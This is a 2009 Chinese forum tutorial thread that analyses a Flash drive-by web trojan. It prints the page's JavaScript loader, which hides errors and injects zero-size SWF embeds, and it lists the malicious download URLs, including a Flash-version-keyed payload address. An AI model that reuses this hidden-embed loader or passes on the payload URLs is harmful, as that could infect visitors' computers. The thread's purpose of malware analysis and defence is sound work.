1   1  /  1  页   跳转

[教程] 再谈flash网马解密(二)

收藏
本主题由 版主 networkedition 于 2009-7-1 10:19:04 执行 关闭主题/取消 操作
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-07-01 09:43 | 显示全部 短消息 资料
字号: 1楼

再谈flash网马解密(二)

flash网马地址:http://vpsvip.com/aa/vcfl.htm,使用freshow获取的源代码如下:

[复制到剪贴板]
CODE:
<script>
document.writeln("<script>function init(){window.status=\"\";}window.onload = init;");
document.writeln("window.onerror=function(){return true;}");
document.writeln("");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"ms"+"ie\")>0)");
document.writeln("{");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');");
document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"1111111111.swf\"\/>\');");
document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');");
document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');");
document.writeln("document.write(\'<embed src=\"1111111111.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}");
document.writeln("else{document.write(\'<EMBED src=\"2222222222.swf\" width=0 height=0>\');}");
document.writeln("<\/script>")
</script>


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
分享到:
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-07-01 09:52 | 显示全部 短消息 资料
字号: 2楼

回复: 再谈flash网马解密(二)

我们先来简单分析一下这段代码,主要是下面两段代码:

 
document.writeln("document.write(\'<embed src=\"1111111111.swf\"\/>\');");

document.writeln("else{document.write(\'<EMBED src=\"2222222222.swf\" width=0 height=0>\');}");

实际上这个源代码中包含有两个swf文件,其下载地址分别为:http://vpsvip.com/aa/1111111111.swf,http://vpsvip.com/aa/2222222222.swf。

使用下载工具将swf下载(以1111111111.swf为例),使用记事本方式打开,其源文件内容如下:
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-07-01 10:09 | 显示全部 短消息 资料
字号: 3楼

回复: 再谈flash网马解密(二)

我们着重来看红色框内容:flashVersion /:$version i1007.asp?ytytyt= _root ?,这段代码是否很熟悉,在我们讲解的一个迷惑人的flash网马一文中,讲到过类似内容。在这里我就不在详细讲解,具体可参看一个迷惑人的flash网马一文中,6楼小聪版主讲解的关于Flashver正确形式内容。


  我们参照该文中Flashver形式,实际上真正的swf网马下载地址如下:http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,28,0
或http://vpsvip.com/aa/i1007.asp?ytytyt=WIN%209,0,16,0其余版本都可以,这里就不依次写出。


按照这个地址我们使用下载工具,下载到一个i1007.swf文件,也有可能为i1007.asp,将asp改为swf即可。

最后编辑networkedition 最后编辑于 2009-07-01 10:15:11
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-07-01 10:14 | 显示全部 短消息 资料
字号: 4楼

回复: 再谈flash网马解密(二)

使用redoce的A>PDF/CWS/Zlib Extractor,进行swf解密,具体操作方法可参看教程:网马解密工具redoce视频之——swf篇 一文。

最终解密结果见下图:




2222222222.swf这个swf网马就不讲解了,感兴趣的可参考本篇教程,自行尝试解密,方法都一样。
最后编辑networkedition 最后编辑于 2009-07-01 10:17:12
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-08-11 10:22 | 显示全部 短消息 资料
字号: 5楼

回复: 再谈flash网马解密(二)

具体可参看一个迷惑人的flash网马一文中,6楼小聪版主讲解的关于Flashver正确形式内容。
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT